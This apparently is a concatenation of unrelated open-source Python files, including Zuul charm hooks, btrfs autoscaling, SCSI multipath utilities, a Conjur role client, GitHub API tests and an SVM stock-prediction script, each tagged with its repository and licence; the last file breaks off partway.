ssh_key = os.path.join(ZUUL_SSH_DIR, ZUUL_SSH_PRIVATE_FILE)
with open(ssh_key, 'w') as f:
f.write(config('ssh-key'))
os.chown(ssh_key, zuul_user.pw_uid, zuul_user.pw_gid)
    os.chmod(ssh_key, 0o600)
def update_zuul_conf():
configs = config()
services_restart = False
if configs.changed('ssh-key'):
generate_zuul_ssh_key()
configs_keys = ['gearman-port', 'gerrit-server', 'username', 'zuul-url',
'status-url', 'git-user-name', 'git-user-email',
'services', 'gearman-server' ]
for key in configs_keys:
if configs.changed(key):
services_restart = True
break
if not services_restart:
log("Zuul config values didn't change.")
return False
configs.save()
render_zuul_conf()
return services_restart
def configure_apache2():
render_zuul_vhost_conf()
# required apache2 modules
subprocess.check_call(["a2enmod", "cgi"])
subprocess.check_call(["a2enmod", "rewrite"])
# disable default website
subprocess.check_call(["a2dissite", "000-default"])
# enable zuul website
subprocess.check_call(["a2ensite", 'zuul'])
service_restart('apache2')
# HOOKS METHODS
def install():
subprocess.check_call(['apt-get', 'install', '-y'] + PACKAGES)
install_from_git(ZUUL_GIT_URL, config('version'))
install_from_git(GEAR_GIT_URL, GEAR_STABLE_TAG)
try:
pwd.getpwnam(ZUUL_USER)
except KeyError:
# create Zuul user
subprocess.check_call(["useradd", "--create-home", ZUUL_USER])
directories = [ ZUUL_CONF_DIR, ZUUL_SSH_DIR, ZUUL_RUN_DIR, ZUUL_STATE_DIR,
ZUUL_GIT_DIR, ZUUL_LOG_DIR, ZUUL_MERGER_RUN_DIR ]
zuul_user = pwd.getpwnam(ZUUL_USER)
for directory in directories:
if not os.path.exists(directory):
os.mkdir(directory)
            os.chmod(directory, 0o755)
os.chown(directory, zuul_user.pw_uid, zuul_user.pw_gid)
generate_zuul_ssh_key()
# generate configuration files
render_logging_conf()
render_gearman_logging_conf()
render_layout()
render_zuul_conf()
create_zuul_upstart_services()
download_openstack_functions()
configure_apache2()
def is_service_enabled(service):
return service in [i.strip() for i in config('services').split(',')]
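# Example (illustrative): with config('services') == 'server, merger',
# is_service_enabled('merger') is True and is_service_enabled('gearman')
# is False.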
def config_changed():
if update_zuul_conf():
# zuul.conf was updated and Zuul services must be restarted
if is_service_enabled("server") or is_service_enabled("gearman"):
service_restart('zuul-server')
if is_service_enabled("merger"):
service_restart('zuul-merger')
log('Zuul services restarted')
def start():
if is_service_enabled("server") or is_service_enabled("gearman"):
service_start('zuul-server')
if is_service_enabled("merger"):
service_start('zuul-merger')
log('Zuul services started.')
def stop():
if is_service_enabled("server") or is_service_enabled("gearman"):
service_stop('zuul-server')
if is_service_enabled("merger"):
service_stop('zuul-merger')
log('Zuul services stopped.')
def zuul_relation_changed():
gearman_port = config('gearman-port')
relation_set(gearman_ip=unit_get('public-address'),
gearman_port=gearman_port)
open_port(gearman_port)
def zuul_relation_broken():
close_port(config('gearman-port'))
| cloudbase/zuul-charm | hooks/hooks.py | Python | apache-2.0 | 9,009 |
from django.conf.urls import patterns, url
from api.views import query
from api.views import search
from api.views import submit
urlpatterns = patterns('',
url(r'^food/$', query.food_handler, name='food'),
url(r'^categories/all/$', query.category_all_handler, name='category'),
url(r'^categories/all/detailed/$', query.category_all_detailed_handler, name='category_detailed'),
url(r'^search/food/$', search.search_food_handler, name='search_food'),
url(r'^submit/$', submit.submit_handler, name='submit')
#url(r'^search/suggestion/$', search.search_suggestion_handler, name='search_suggestion')
)
| czgu/opendataexperience | server/api/urls.py | Python | apache-2.0 | 625 |
def init_actions_(service, args):
"""
    this needs to return an array of actions representing the dependencies between actions.
    Look at ACTION_DEPS in this module for an example of what is expected
"""
# some default logic for simple actions
return {
'autoscale': ['install']
}
def install(job):
service = job.service
# List available devices
code, out, err = service.executor.cuisine.core.run('lsblk -J -o NAME,FSTYPE,MOUNTPOINT')
if code != 0:
        raise RuntimeError('failed to list block devices: %s' % err)
disks = j.data.serializer.json.loads(out)
btrfs_devices = []
for device in disks['blockdevices']:
if not device['name'].startswith('vd') or device['name'] == 'vda':
continue
btrfs_devices.append(device)
btrfs_devices.sort(key=lambda e: e['name'])
if len(btrfs_devices) == 0:
raise RuntimeError('no data disks on machine')
master = btrfs_devices[0]
if master['fstype'] != 'btrfs':
# creating the filesystem on all of the devices.
cmd = 'mkfs.btrfs -f %s' % ' '.join(map(lambda e: '/dev/%s' % e['name'], btrfs_devices))
code, out, err = service.executor.cuisine.core.run(cmd)
if code != 0:
raise RuntimeError('failed to create filesystem: %s' % err)
if master['mountpoint'] is None:
service.executor.cuisine.core.dir_ensure(service.model.data.mount)
cmd = 'mount /dev/%s %s' % (master['name'], service.model.data.mount)
code, out, err = service.executor.cuisine.core.run(cmd)
if code != 0:
raise RuntimeError('failed to mount device: %s' % err)
# Last thing is to check that all devices are part of the filesystem
# in case we support hot plugging of disks in the future.
code, out, err = service.executor.cuisine.core.run('btrfs filesystem show /dev/%s' % master['name'])
if code != 0:
raise RuntimeError('failed to inspect filesystem on device: %s' % err)
# parse output.
import re
fs_devices = re.findall('devid\s+.+\s/dev/(.+)$', out, re.MULTILINE)
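    # Illustrative 'btrfs filesystem show' line this regex is assumed to match:
    #   "devid    1 size 10.00GiB used 2.00GiB path /dev/vdb"
    # from which it extracts the bare device names ('vdb', ...).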
for device in btrfs_devices:
if device['name'] not in fs_devices:
# add device to filesystem
cmd = 'btrfs device add -f /dev/%s %s' % (device['name'], service.model.data.mount)
code, _, err = service.executor.cuisine.core.run(cmd)
if code != 0:
raise RuntimeError('failed to add device %s to fs: %s' % (
device['name'],
err)
)
def autoscale(job):
service = job.service
repo = service.aysrepo
exc = service.executor
cuisine = exc.cuisine
code, out, err = cuisine.core.run('btrfs filesystem usage -b {}'.format(service.model.data.mount), die=False)
if code != 0:
        raise RuntimeError('failed to get device usage: %s' % err)
# get free space.
import re
match = re.search('Free[^:]*:\s+(\d+)', out)
if match is None:
raise RuntimeError('failed to get free space')
free = int(match.group(1)) / (1024 * 1024) # MB.
node = None
for parent in service.parents:
if parent.model.role == 'node':
node = parent
break
if node is None:
raise RuntimeError('failed to find the parent node')
current_disks = list(node.model.data.disk)
if free < service.model.data.threshold:
# add new disk to the array.
args = {
'size': service.model.data.incrementSize,
'prefix': 'autoscale',
}
adddiskjob = node.getJob('add_disk')
adddiskjob.model.args = args
adddiskjob.executeInProcess()
node = repo.serviceGet(node.model.role, node.name)
new_disks = list(node.model.data.disk)
added = set(new_disks).difference(current_disks)
# if len(added) != 1:
# raise RuntimeError('failed to find the new added disk (disks found %d)', len(added))
#TODO: add device to volume
# get the disk object.
if added:
disk_name = added.pop()
disk = None
os_svc = service.producers['os'][0]
nod = os_svc.producers['node'][0]
for dsk in nod.producers.get('disk', []):
if dsk.model.dbobj.name == disk_name:
disk = dsk
break
if disk is None:
raise RuntimeError('failed to find disk service instance')
rc, out, err = cuisine.core.run("btrfs device add /dev/{devicename} {mountpoint}".format(devicename=disk.model.data.devicename, mountpoint=service.model.data.mount))
if rc != 0:
raise RuntimeError("Couldn't add device to /data")
| Jumpscale/ays_jumpscale8 | templates/fs/fs.btrfs/actions.py | Python | apache-2.0 | 4,712 |
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.parametrics import ParametricRunControl
log = logging.getLogger(__name__)
class TestParametricRunControl(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_parametricruncontrol(self):
pyidf.validation_level = ValidationLevel.error
obj = ParametricRunControl()
# alpha
var_name = "Name"
obj.name = var_name
paras = []
var_perform_run_1 = "Yes"
paras.append(var_perform_run_1)
obj.add_extensible(*paras)
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.parametricruncontrols[0].name, var_name)
index = obj.extensible_field_index("Perform Run 1")
self.assertEqual(idf2.parametricruncontrols[0].extensibles[0][index], var_perform_run_1) | rbuffat/pyidf | tests/test_parametricruncontrol.py | Python | apache-2.0 | 1,196 |
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic linux scsi subsystem and Multipath utilities.
Note, this is not iSCSI.
"""
import os
import re
from oslo_concurrency import processutils as putils
from oslo_log import log as logging
from os_brick import exception
from os_brick import executor
from os_brick.i18n import _LW
from os_brick import utils
LOG = logging.getLogger(__name__)
MULTIPATH_ERROR_REGEX = re.compile("\w{3} \d+ \d\d:\d\d:\d\d \|.*$")
MULTIPATH_WWID_REGEX = re.compile("\((?P<wwid>.+)\)")
class LinuxSCSI(executor.Executor):
def __init__(self, root_helper, execute=putils.execute,
*args, **kwargs):
super(LinuxSCSI, self).__init__(root_helper, execute,
*args, **kwargs)
def echo_scsi_command(self, path, content):
"""Used to echo strings to scsi subsystem."""
args = ["-a", path]
kwargs = dict(process_input=content,
run_as_root=True,
root_helper=self._root_helper)
self._execute('tee', *args, **kwargs)
def get_name_from_path(self, path):
"""Translates /dev/disk/by-path/ entry to /dev/sdX."""
name = os.path.realpath(path)
if name.startswith("/dev/"):
return name
else:
return None
def remove_scsi_device(self, device):
"""Removes a scsi device based upon /dev/sdX name."""
path = "/sys/block/%s/device/delete" % device.replace("/dev/", "")
if os.path.exists(path):
# flush any outstanding IO first
self.flush_device_io(device)
LOG.debug("Remove SCSI device %(device)s with %(path)s",
{'device': device, 'path': path})
self.echo_scsi_command(path, "1")
@utils.retry(exceptions=exception.VolumePathNotRemoved, retries=3,
backoff_rate=1)
def wait_for_volume_removal(self, volume_path):
"""This is used to ensure that volumes are gone."""
LOG.debug("Checking to see if SCSI volume %s has been removed.",
volume_path)
if os.path.exists(volume_path):
LOG.debug("%(path)s still exists.", {'path': volume_path})
raise exception.VolumePathNotRemoved(
volume_path=volume_path)
else:
LOG.debug("SCSI volume %s has been removed.", volume_path)
def get_device_info(self, device):
(out, _err) = self._execute('sg_scan', device, run_as_root=True,
root_helper=self._root_helper)
dev_info = {'device': device, 'host': None,
'channel': None, 'id': None, 'lun': None}
if out:
line = out.strip()
line = line.replace(device + ": ", "")
info = line.split(" ")
for item in info:
if '=' in item:
pair = item.split('=')
dev_info[pair[0]] = pair[1]
elif 'scsi' in item:
dev_info['host'] = item.replace('scsi', '')
return dev_info
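    # Illustrative sg_scan output line (format assumed):
    #   "/dev/sdb: scsi1 channel=0 id=0 lun=2"
    # parses to {'device': '/dev/sdb', 'host': '1', 'channel': '0',
    #            'id': '0', 'lun': '2'}.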
def remove_multipath_device(self, multipath_name):
"""This removes LUNs associated with a multipath device
and the multipath device itself.
"""
LOG.debug("remove multipath device %s", multipath_name)
mpath_dev = self.find_multipath_device(multipath_name)
if mpath_dev:
devices = mpath_dev['devices']
LOG.debug("multipath LUNs to remove %s", devices)
for device in devices:
self.remove_scsi_device(device['device'])
self.flush_multipath_device(mpath_dev['id'])
def flush_device_io(self, device):
"""This is used to flush any remaining IO in the buffers."""
try:
LOG.debug("Flushing IO for device %s", device)
self._execute('blockdev', '--flushbufs', device, run_as_root=True,
root_helper=self._root_helper)
except putils.ProcessExecutionError as exc:
LOG.warning(_LW("Failed to flush IO buffers prior to removing "
"device: %(code)s"), {'code': exc.exit_code})
def flush_multipath_device(self, device):
try:
LOG.debug("Flush multipath device %s", device)
self._execute('multipath', '-f', device, run_as_root=True,
root_helper=self._root_helper)
except putils.ProcessExecutionError as exc:
LOG.warning(_LW("multipath call failed exit %(code)s"),
{'code': exc.exit_code})
def flush_multipath_devices(self):
try:
self._execute('multipath', '-F', run_as_root=True,
root_helper=self._root_helper)
except putils.ProcessExecutionError as exc:
LOG.warning(_LW("multipath call failed exit %(code)s"),
{'code': exc.exit_code})
def find_multipath_device(self, device):
"""Find a multipath device associated with a LUN device name.
device can be either a /dev/sdX entry or a multipath id.
"""
mdev = None
devices = []
out = None
try:
(out, _err) = self._execute('multipath', '-l', device,
run_as_root=True,
root_helper=self._root_helper)
except putils.ProcessExecutionError as exc:
LOG.warning(_LW("multipath call failed exit %(code)s"),
{'code': exc.exit_code})
return None
if out:
lines = out.strip()
lines = lines.split("\n")
lines = [line for line in lines
if not re.match(MULTIPATH_ERROR_REGEX, line)]
if lines:
# Use the device name, be it the WWID, mpathN or custom alias
# of a device to build the device path. This should be the
# first item on the first line of output from `multipath -l
                # ${path}` or `multipath -l ${wwid}`.
mdev_name = lines[0].split(" ")[0]
mdev = '/dev/mapper/%s' % mdev_name
# Find the WWID for the LUN if we are using mpathN or aliases.
wwid_search = MULTIPATH_WWID_REGEX.search(lines[0])
if wwid_search is not None:
mdev_id = wwid_search.group('wwid')
else:
mdev_id = mdev_name
# Confirm that the device is present.
try:
os.stat(mdev)
except OSError:
                LOG.warning(_LW("Couldn't find multipath device %s"), mdev)
return None
LOG.debug("Found multipath device = %(mdev)s",
{'mdev': mdev})
device_lines = lines[3:]
for dev_line in device_lines:
if dev_line.find("policy") != -1:
continue
dev_line = dev_line.lstrip(' |-`')
dev_info = dev_line.split()
address = dev_info[0].split(":")
dev = {'device': '/dev/%s' % dev_info[1],
'host': address[0], 'channel': address[1],
'id': address[2], 'lun': address[3]
}
devices.append(dev)
if mdev is not None:
info = {"device": mdev,
"id": mdev_id,
"name": mdev_name,
"devices": devices}
return info
return None
| citrix-openstack-build/os-brick | os_brick/initiator/linuxscsi.py | Python | apache-2.0 | 8,320 |
import sys
import os.path
from logging import ERROR, WARN, INFO, DEBUG
import time
try:
import datablox_framework
except ImportError:
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),
"../../datablox_framework")))
import datablox_framework
from datablox_framework.block import *
from datablox_framework.shard import *
class web_crawler_shard(Shard):
@classmethod
def initial_configs(cls, config):
return [config for i in range(config["nodes"])]
@classmethod
def node_type(self):
return {"name": "Web-Crawler", "input_port": "input", "output_port": "output", "port_type": "PUSH"}
def on_load(self, config):
self.config = config
self.nodes = config["nodes"]
self.max_nodes = 20
self.current_node = 0
self.add_port("input", Port.PUSH, Port.UNNAMED, ["internet_url"])
self.add_port("rpc", Port.QUERY, Port.UNNAMED, ["internet_url"])
self.log(INFO, "Web crawler shard loaded")
def config_for_new_node(self):
return self.config
def recv_push(self, port, log):
self.log(INFO, "%s sending to port %d" % (self.id, self.current_node))
self.push_node(self.current_node, log)
self.current_node = (self.current_node + 1) % self.nodes
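  # Pushes are distributed round-robin across the shard's nodes; when a new
  # node is added (should_add_node), distribution restarts from that node.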
def can_add_node(self):
return (self.nodes < self.max_nodes)
def should_add_node(self, node_num):
self.log(INFO, self.id + " should_add_node got a new node")
self.nodes += 1
# start distribution from the new node
self.current_node = node_num
def recv_query(self, port, log):
self.log(INFO, "%s sending to port %d" % (self.id, self.current_node))
self.push_node(self.current_node, log)
self.current_node = (self.current_node + 1) % self.nodes
ret = Log()
ret.log["result"] = True
self.return_query_res(port, ret)
| mpi-sws-rse/datablox | blox/web_crawler_shard__1_0/b_web_crawler_shard.py | Python | apache-2.0 | 1,854 |
import responses
from zeus.constants import Permission
from zeus.models import (
Repository,
RepositoryAccess,
RepositoryBackend,
RepositoryProvider,
)
REPO_DETAILS_RESPONSE = """{
"id": 1,
"full_name": "getsentry/zeus",
"clone_url": "https://github.com/getsentry/zeus.git",
"ssh_url": "[email protected]:getsentry/zeus.git",
"permissions": {
"admin": true
}
}"""
REPO_LIST_RESPONSE = """[{
"id": 1,
"full_name": "getsentry/zeus",
"clone_url": "https://github.com/getsentry/zeus.git",
"ssh_url": "[email protected]:getsentry/zeus.git",
"permissions": {
"admin": true
}
}]"""
KEY_RESPONSE = """{
"id": 1,
"key": "ssh-rsa AAA...",
"url": "https://api.github.com/repos/getsentry/zeus/keys/1",
"title": "zeus",
"verified": true,
"created_at": "2014-12-10T15:53:42Z",
"read_only": true
}"""
def test_new_repository_github(
client, mocker, default_login, default_user, default_identity
):
responses.add(
"GET",
"https://api.github.com/repos/getsentry/zeus",
match_querystring=True,
body=REPO_DETAILS_RESPONSE,
)
responses.add(
"POST", "https://api.github.com/repos/getsentry/zeus/keys", body=KEY_RESPONSE
)
resp = client.post("/api/github/repos", json={"name": "getsentry/zeus"})
assert resp.status_code == 201
data = resp.json()
assert data["id"]
repo = Repository.query.unrestricted_unsafe().get(data["id"])
assert repo.url == "[email protected]:getsentry/zeus.git"
assert repo.backend == RepositoryBackend.git
assert repo.provider == RepositoryProvider.github
assert repo.external_id == "1"
assert repo.data == {"full_name": "getsentry/zeus"}
access = list(
RepositoryAccess.query.filter(RepositoryAccess.repository_id == repo.id)
)
assert len(access) == 1
assert access[0].user_id == default_user.id
assert access[0].permission == Permission.admin
def test_deactivate_repository_github(
client, mocker, default_login, default_repo, default_repo_access
):
mock_delay = mocker.patch("zeus.config.celery.delay")
resp = client.delete(
"/api/github/repos",
json={"name": "{}/{}".format(default_repo.owner_name, default_repo.name)},
)
assert resp.status_code == 202
mock_delay.assert_called_once_with(
"zeus.delete_repo", repository_id=default_repo.id
)
def test_deactivate_non_existing_repository_github(client, default_login):
resp = client.delete("/api/github/repos", json={"name": "getsentry/does-not-exist"})
assert resp.status_code == 404
assert "not found" in resp.json()["message"]
def test_list_github_repos(client, default_login, default_user, default_identity):
responses.add(
"GET",
"https://api.github.com/user/repos?type=owner",
match_querystring=True,
body=REPO_LIST_RESPONSE,
)
resp = client.get("/api/github/repos")
assert resp.status_code == 200
data = resp.json()
assert len(data) == 1
assert data[0]["name"] == "getsentry/zeus"
assert not data[0]["status"]
assert data[0]["permissions"]["admin"]
assert data[0]["permissions"]["read"]
assert data[0]["permissions"]["write"]
def test_list_github_active_repo_within_scope(
client,
default_login,
default_user,
default_identity,
default_repo,
default_repo_access,
):
responses.add(
"GET",
"https://api.github.com/user/repos?type=owner",
match_querystring=True,
body=REPO_LIST_RESPONSE,
)
resp = client.get("/api/github/repos")
assert resp.status_code == 200
data = resp.json()
assert len(data) == 1
assert data[0]["name"] == "getsentry/zeus"
assert data[0]["status"] == "active"
def test_list_github_active_repo_out_of_scope(
client, default_login, default_user, default_identity, default_repo
):
responses.add(
"GET",
"https://api.github.com/user/repos?type=owner",
match_querystring=True,
body=REPO_LIST_RESPONSE,
)
resp = client.get("/api/github/repos")
assert resp.status_code == 200
data = resp.json()
assert len(data) == 1
assert data[0]["name"] == "getsentry/zeus"
assert not data[0]["status"]
| getsentry/zeus | tests/zeus/api/resources/test_github_repositories.py | Python | apache-2.0 | 4,294 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import talib
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 30)
pd.set_option('precision', 7)
pd.options.display.float_format = '{:,.3f}'.format
import warnings
warnings.simplefilter(action = "ignore", category = FutureWarning)
from sklearn import preprocessing, svm, cross_validation, metrics, pipeline, grid_search
from scipy.stats import sem
from sklearn.decomposition import PCA, KernelPCA
'''
Read OHLCV data for one stock for the given years.
Inputs: baseDir and stockCode are strings; startYear and yearNum are integers.
Output: a pandas DataFrame
'''
def readWSDFile(baseDir, stockCode, startYear, yearNum=1):
# 解析日期
dateparse = lambda x: pd.datetime.strptime(x, '%Y-%m-%d').date()
df = 0
for i in range(yearNum):
tempDF = pd.read_csv(baseDir+stockCode+'/wsd_'+stockCode+'_'+str(startYear+i)+'.csv',
index_col=0, sep='\t', usecols=[0,2,3,4,5,6,7,9,10,12,15], header=None,
skiprows=1, names=['Date','Open','High','Low','Close','Volume','Amount',
'Chg','Chg Pct','Avg','Turn'],
parse_dates=True, date_parser=dateparse)
if i==0: df = tempDF
else: df = df.append(tempDF)
return df
# full candidate column set (kept for reference; the narrower selection below is used)
# usecols = [0, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
#            21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 33, 34, 36, 37]
usecols = [0, 6, 16, 17, 24, 31]
def readWSDIndexFile(baseDir, stockCode, startYear, yearNum=1):
    # parse dates
dateparse = lambda x: pd.datetime.strptime(x, '%Y-%m-%d').date()
df = 0
for i in range(yearNum):
tempDF = pd.read_csv(baseDir+'I'+stockCode+'/wsd_'+stockCode+'_'+str(startYear+i)+'.csv',
index_col=0, sep=',', parse_dates=True, date_parser=dateparse, usecols=usecols)
if i==0: df = tempDF
else: df = df.append(tempDF)
return df
def prepareData(df, dfi, win=5):
    # rolling means of: open, high, low, volume, amount,
    # change, change pct, average price, turnover,
    # r (daily return),
    # plus 38 technical indicators
open = pd.rolling_mean(df['Open'], window=win)
high = pd.rolling_mean(df['High'], window=win)
low = pd.rolling_mean(df['Low'], window=win)
volume = pd.rolling_mean(df['Volume'], window=win)
amount = pd.rolling_mean(df['Amount'], window=win)
change = pd.rolling_mean(df['Chg'], window=win)
changePct = pd.rolling_mean(df['Chg Pct'], window=win)
average = pd.rolling_mean(df['Avg'], window=win)
turn = pd.rolling_mean(df['Turn'], window=win)
dailyreturn = df['Close'].pct_change()
dailyreturn[0] = dailyreturn[1]
r = pd.rolling_mean(dailyreturn, window=win)
techDF = pd.rolling_mean(dfi, window=win)
tempX = np.column_stack((open[win-1:], high[win-1:], low[win-1:], volume[win-1:], amount[win-1:],
change[win-1:], changePct[win-1:], average[win-1:], turn[win-1:], r[win-1:]))
X = np.hstack((tempX, techDF.values[win-1:]))
y = []
for i in range(win-1, len(dailyreturn)):
if dailyreturn[i]<0: y.append(-1)
elif dailyreturn[i]>0: y.append(1)
        else: y.append(y[-1]) # fill with the previous label
return X, y
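# Illustrative shapes: with win=12 and n trading days, X has n-win+1 rows and
# 10 base columns (rolling means) plus one column per technical-indicator
# column in dfi; y holds the matching -1/+1 direction labels.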
def optimizeSVM(X_norm, y, kFolds=10):
clf = pipeline.Pipeline([
('svc', svm.SVC(kernel='rbf')),
])
    # grid search over multiple hyperparameters
parameters = {
# 'svc__gamma': np.logspace(-1, 3, 20),
# 'svc__C': np.logspace(-1, 3, 10),
# 'svc__gamma': np.logspace(-3, 11, 8, base=2),
# 'svc__C': np.logspace(-3, 15, 10, base=2),
'svc__gamma': np.logspace(-3, 11, 8, base=2),
'svc__C': np.logspace(-3, 15, 10, base=2),
}
gs = grid_search.GridSearchCV(clf, parameters, verbose=1, refit=False, cv=kFolds)
gs.fit(X_norm, y)
return gs.best_params_['svc__gamma'], gs.best_params_['svc__C'], gs.best_score_
def plot3D(X_pca, y):
red_x, red_y, red_z = [], [], []
blue_x, blue_y, blue_z = [], [], []
for i in range(len(X_pca)):
if y[i]==-1:
red_x.append(X_pca[i][0])
red_y.append(X_pca[i][1])
red_z.append(X_pca[i][2])
elif y[i]==1:
blue_x.append(X_pca[i][0])
blue_y.append(X_pca[i][1])
blue_z.append(X_pca[i][2])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(red_x, red_y, red_z, c='r', marker='x')
ax.scatter(blue_x, blue_y, blue_z, c='g', marker='.')
ax.set_xlabel('X Label')
ax.set_ylabel('Y Label')
ax.set_zlabel('Z Label')
plt.show()
baseDir = '/Users/eugene/Downloads/data/'
stockCodes = ['000300.SH', '000016.SH', '000905.SH']
i = 0
startYear = 2014
number = 2
df = readWSDFile(baseDir, stockCodes[i], startYear, number)
print 'Day count:', len(df)
# print df.head(5)
dfi = readWSDIndexFile(baseDir, stockCodes[i], startYear, number)
X, y = prepareData(df, dfi, win=12)
print np.shape(X), np.shape(y)
# print np.shape(X)
normalizer = preprocessing.Normalizer().fit(X) # fit does nothing
X_norm = normalizer.transform(X)
# estimator = PCA(n_components=10)
# estimator_kernel = KernelPCA(n_components=12, kernel='rbf')
# # X_pca = estimator.fit_transform(X_norm)
# X_pca = estimator_kernel.fit_transform(X_norm)
# plot3D(X_pca, y)
# grid search over multiple hyperparameters
gamma, C, score = optimizeSVM(X_norm, y, kFolds=10)
print 'gamma=',gamma, 'C=',C, 'score=',score | Ernestyj/PyStudy | finance/DaysTest/DaysDataPrepareOld.py | Python | apache-2.0 | 5,771 |
#
# Copyright (C) 2014 Conjur Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from conjur.util import urlescape, authzid
from conjur.exceptions import ConjurException
import logging
class Role(object):
"""
Represents a Conjur [role](https://developer.conjur.net/key_concepts/rbac.html#rbac-roles).
An instance of this class does not know whether the role in question exists.
Generally you should create instances of this class through the `conjur.API.role` method,
or the `Role.from_roleid` classmethod.
Roles can provide information about their members and can check whether the role they represent
is allowed to perform certain operations on resources.
`conjur.User` and `conjur.Group` objects have `role` members that reference the role corresponding
to that Conjur asset.
"""
def __init__(self, api, kind, identifier):
"""
Create a role to represent the Conjur role with id `<kind>:<identifier>`. For
example, to represent the role associated with a user named bob,
role = Role(api, 'user', 'bob')
`api` must be a `conjur.API` instance, used to implement this classes interactions with Conjur
`kind` is a string giving the role kind
`identifier` is the unqualified identifier of the role.
"""
self.api = api
"""
The `conjur.API` instance used to implement our methods.
"""
self.kind = kind
"""
The `kind` portion of the role's id.
"""
self.identifier = identifier
"""
The `identifier` portion of the role's id.
"""
@classmethod
def from_roleid(cls, api, roleid):
"""
Creates an instance of `conjur.Role` from a full role id string.
`api` is an instance of `conjur.API`
`roleid` is a fully or partially qualified Conjur identifier, for example,
`"the-account:service:some-service"` or `"service:some-service"` resolve to the same role.
"""
tokens = authzid(roleid, 'role').split(':', 3)
if len(tokens) == 3:
tokens.pop(0)
return cls(api, *tokens)
@property
def roleid(self):
"""
Return the full role id as a string.
Example:
>>> role = api.role('user', 'bob')
>>> role.roleid
'the-account:user:bob'
"""
return ':'.join([self.api.config.account, self.kind, self.identifier])
def is_permitted(self, resource, privilege):
"""
        Check whether this role has `privilege` on `resource`.
`resource` is a qualified identifier for the resource.
`privilege` is a string like `"update"` or `"execute"`.
Example:
>>> role = api.role('user', 'alice')
>>> if role.is_permitted('variable:db-password', 'execute'):
... print("Alice can fetch the database password")
... else:
... print("Alice cannot fetch the database password")
"""
params = {
'check': 'true',
'resource_id': authzid(resource, 'resource'),
'privilege': privilege
}
response = self.api.get(self._url(), params=params,
check_errors=False)
if response.status_code == 204:
return True
elif response.status_code in (403, 404):
return False
else:
raise ConjurException("Request failed: %d" % response.status_code)
def grant_to(self, member, admin=None):
"""
Grant this role to `member`.
`member` is a string or object with a `role` attribute or `roleid` method,
such as a `conjur.User` or `conjur.Group`.
`admin` whether the member can grant this role to others.
"""
data = {}
if admin is not None:
data['admin'] = 'true' if admin else 'false'
self.api.put(self._membership_url(member), data=data)
def revoke_from(self, member):
"""
The inverse of `conjur.Role.grant_to`. Removes `member` from the members of this
role.
`member` is a string or object with a `role` attribute or `roleid` method,
such as a `conjur.User` or `conjur.Group`.
"""
self.api.delete(self._membership_url(member))
def members(self):
"""
Return a list of members of this role. Members are returned as `dict`s
with the following keys:
* `'member'` the fully qualified identifier of the group
* `'role'` the fully qualified identifier of the group (redundant)
* `'grantor'` the role that granted the membership
* `'admin_option'` whether this member can grant membership in the group to other roles.
"""
return self.api.get(self._membership_url()).json()
def _membership_url(self, member=None):
url = self._url() + "?members"
if member is not None:
memberid = authzid(member, 'role')
url += "&member=" + urlescape(memberid)
return url
def _url(self, *args):
return "/".join([self.api.config.authz_url,
self.api.config.account,
'roles',
self.kind,
self.identifier] + list(args))
| conjurinc/api-python | conjur/role.py | Python | apache-2.0 | 6,400 |
from copy import deepcopy
from geom import geom
import numpy as np
import pandas as pd
class geom_jitter(geom):
VALID_AES = ['jitter']
def __radd__(self, gg):
gg = deepcopy(gg)
xcol = gg.aesthetics.get("x")
ycol = gg.aesthetics.get("y")
x = gg.data[xcol]
y = gg.data[ycol]
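        # Note: this is multiplicative jitter (each coordinate is scaled by a
        # random factor in [0.9, 1.1]), so the spread grows with the value,
        # unlike ggplot2's additive jitter.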
x = x * np.random.uniform(.9, 1.1, len(x))
y = y * np.random.uniform(.9, 1.1, len(y))
gg.data[xcol] = x
gg.data[ycol] = y
return gg
def plot_layer(self, layer):
pass
| hadley/ggplot | ggplot/geoms/geom_jitter.py | Python | bsd-2-clause | 542 |
class ConstraintFailureException(Exception):
pass
| tmaiwald/OSIM | OSIM/Optimizations/ConstraintFailureException.py | Python | bsd-2-clause | 55 |
#!/usr/bin/env python
# this only exists because sympy crashes IDAPython
# for general use sympy is much more complete
import traceback
import types
import copy
import operator
import random
import string
from memoize import Memoize
import numpy
import util
def collect(exp, fn):
rv = set()
def _collect(exp):
if fn(exp):
rv.add(exp)
return exp
